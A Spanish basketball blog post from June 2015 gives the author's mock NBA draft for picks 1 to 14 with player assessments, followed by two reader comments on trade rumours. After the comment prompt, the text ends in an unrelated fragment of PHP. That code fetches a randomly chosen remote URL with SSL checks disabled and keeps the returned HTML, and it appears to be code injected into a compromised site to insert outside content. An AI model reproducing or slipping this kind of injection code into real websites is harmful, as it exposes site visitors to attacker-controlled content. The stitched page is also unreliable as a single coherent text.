Mock Draft 2015 3.0

23 de June de 2015 por Viva_Dirk

Última actualización de nuestro mock draft a escasos dos días para el draft. Recordad que este se llevará a cabo a partir de la 1:00 hora española desde Brooklyn. Los más frikis del lugar lo podréis vivir en directo gracias a una magnífica sala de chat que montaremos expresamente para la ocasión. De esta manera será mucho más fácil criticar la elección de los Knicks, comentar como se desinflan hypes y catalogar a algún jugador elegido en las últimas posiciones de la primera ronda como “el gran robo del draft” (si es que llegamos a esas horas).

Los rumores y noticias se han sucedido desde que publicamos la versión 2.0 hace unas 3 semanas. Teniendo en cuenta estos rumores y sobretodo mis opiniones personales aquí os dejo mi particular mock draft 3.0:

Pick 1 – Minnesota Timberwolves – Karl Anthony Towns: Ahí sigue el dominicano, encaramado en lo más alto de cualquier mock que podáis consultar. Elección evidente para los Wolves gracias a unas capacidades atléticas bestiales. Físicamente es un portento y tiene un buen rango de tiro,pero algunos hechos dejan entrever una personalidad aún con mucho por madurar.

Pick 2 – Los Angeles Lakers – Jahlil Okafor: Hace unas semanas la elección parecía cantada pero últimamente han sonado los nombres de Russell e incluso el de Porzingis. De todas maneras, el ex de Duke es un valor más seguro que ambos, un center con un juego ofensivo muy completo al poste y buen reboteador. No se le supone el potencial de otros pero es sin duda candidato a ROY.

Pick 3 – Philadelphia 76ers – D’Angelo Russell: La noticia de la recaída de Embiid ha caído como una bomba entre los aficionados de los Sixers aunque últimamente se ha oido algún rumor de que la supuesta gravedad no es tan tanta y que todo podría ser una cortina de humo de la directiva para poder draftear otro interior sin que la afición se le tire al cuello (¿Porzingis?). En un mundo normal deberían elegir a Russell, cualquier otra opción sería jugársela a cometer una cagada histórica. Con Embiid o sin Embidd, tankeando o sin tankear, con Saric o sin Saric los Sixers no debería dejar pasar al jugador con más talento puro del draft. 

Pick 4 – New York Knicks – Kristaps Porzingis: Su workout ha impresionado a más de uno en la liga. Algún GM ha llegado a decir que “es el mejor jugador del draft”. El letón presenta la típicas dudas de la mayoría de europeos respecto la adaptación física y la capacidad defensiva pero su talento, sus capacidades atléticas y su enorme rango de tiro están fuera de toda duda. Otros jugadores que podrían considerar los Knicks como Mudiay o Winslow no acaban de cuadrar en el proyecto. De todas maneras que nadie se extraña si los Knicks acaban traspasando esta elección por un número mayor de elecciones presentes y futuras. Celtics y Sixers están al acecho.

Pick 5 – Orlando Magic – Justise Winslow: Personalmente me encanta esta elección para Orlando. Winslow es un jugador de tremendo carácter capaz de influir en un grupo a la hora de competir. La mezcla con Payton y Oladipo será tremenda en el apartado defensivo y su gran capacidad atlética le ha de permitir atacar el aro con fuerza. Los Magic deberían ganar muchos partidos en el actual Este con esta base.

Pick 6 – Sacramento Kings – Emmanuel Mudiay: Hace unas semanas Mudiay era uno de los “4 grandes” del draft y ahora en muchos mocks se mueva más bien entre esta y la siguiente elección. El trío Mudiay-Gay-Cousins debe bastar para ilusionar a los Kings, con jugadores de un perfil más bajo en el resto de posiciones. Mudiay puede surtir de balones a Cousins, salir en transición tan rápido como el que más y dejar peso en el ataque estático a Rudy Gay.

Pick 7 – Denver Nuggets – Mario Hezonja: En los últimos días se comenta que en Denver todo está venta. Borrón y cuenta nueva tras un año nadando en la mediocridad. En esta situación los de Colorado deben apostar por un proyecto de estrella. Hezonja representa la esperanza de escoger un jugador rebosante de talento, con gran físico, buena mano y ese toque de genialidad que tienen los grandes. Un toque de genialidad que es a la vez su handicap ya que su cabeza no parece muy bien amueblada.

Pick 8 – Detroit Pistons – Frank Kaminsky: En esta elección me separo completo del consenso establecido. Desde mi punto de vista “Frank the Tank” es el jugador perfecto para completar un juego interior con Drummond. El ex de Wisconsin puede ofrecer liderazgo ofensivo desde el primer momento. Su repertorio en ataque es amplísimo y su rango de tiro ha ido aumentando progresivamente.El problema es que la defensa no es su fuerte y tiene pocas posibilidades de mejora.

Pick 9 – Charlotte Hornets – Willie Cauley-Stein: Como en el caso anterior, Stein encaja con la estrella del equipo como las piezas de un puzzle, él y Al Jefferson se complementarían a la perfección. Sus capacidades defensivas y su actitud sobre la cancha están fuera de toda duda, pero su nula capacidad ofensiva tampoco se puede discutir.

Pick 10 – Miami Heat – Stanley Johnson: Sin grandes necesidades que cubrir, los Heat pueden elegir al mejor jugador disponible que a la vez disponga de alguna posibilidad de convertirse en un jugador importante. Johnson es un alero muy completo, un alero clásico con un gran físico, buen defensor y un tiro exterior irregular aunque en franca progresión.

Pick 11 – Indiana Pacers – Devin Booker: Con la vuelta de Paul George los Pacers aspiran a las primeras plazas del Este, y Booker puede ayudarles cumpliendo un papel similar al que cumplió Stephenson con gran éxito. Booker llega al draft como uno de los mejores anotadores de su promoción a pesar de que se ha mantenido algo escondido durante la temporada al estar inmerso en el “sistema Kentucky”.

Pick 12 – Utah Jazz – Sam Dekker: Con el juego interior bien cubierto y dos jóvenes elegidos en posiciones muy altas peleando por el puesto de base, Dekker puede ser una buena elección para los de Salt Lake City. Podría jugar de alero cuando Hayward se desplace a la posición de escolta y de 4 al lado tanto de Favors como de Gobert. Juega muy bien al baloncesto, sabe defender y atacar sin basarse en su físico, algo en lo que nunca va a destacar. Hay que reconocer que los mocks le dan mucho más abajo, algunos incluso a partir de la elección 17.

Pick 13 – Phoenix Suns – Myles Turner: Turner parece carne de DLeague. Tiene potencial de estrella pero también un desconocimiento del juego alarmante. Este pívot de 2’11 es capaz de taponar todo lo que pasa por su zona y de anotar triples en la zona contraria. Hornacek ha dado minutos de calidad a sus rookiespero tendrá trabajo con este diamante en bruto por pulir.

Pick 14 – Oklahoma City – Cameron Payne: El ex de Murray State es el Elfrid Payton de este año. Jugador prácticamente desconocido que poco a poco ha ido subiendo posiciónes en los mocks hasta llegar a las posiciones de lotería. En los Thunder Payne podría ejercer de ‘Reggie Jackson’ con la salvedad de que dificilmente podría jugar de escolta. Es un base de gran talento y capacidad de distribución pero que deja algunas dudas respecto su físico y su capacidad defensiva.

Comenta

2 comentarios a esta entrada

  1. Triceratops dice:
    #1

    Empieza a sonar un trade a 3 bandas Orlando, Lakers y Sacramento.

    Lakers consiguen a Cousins
    Kings consiguen a Vucevic
    Magic consiguen a Randle y el pick 2 de Lakers

      Citar

  2. Triceratops dice:
    #2

    Creo que Orlando va a traspasar su pick 5, por otra parte, ¿no os parece Stanley Johnson mejor alero que Winslow? Yo, por los videos que he visto, creo que defensivamente estan a la par, pero Johnson me parece mucho mejor atacante y con más cuerpo para defender y postear.

    Coincido en que Cameron Payne es un robo, ya hablé sobre él en la anterior entrada Mock 2.0.

    No entiendo porque Mudiay está cayendo tanto, me parece el jugador idóneo para los Knicks. En cambio, Porzingis me deja muchas dudas, suerte si consigue llegar al nivel de Bargnani, pero para mi es un bust en toda regla.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>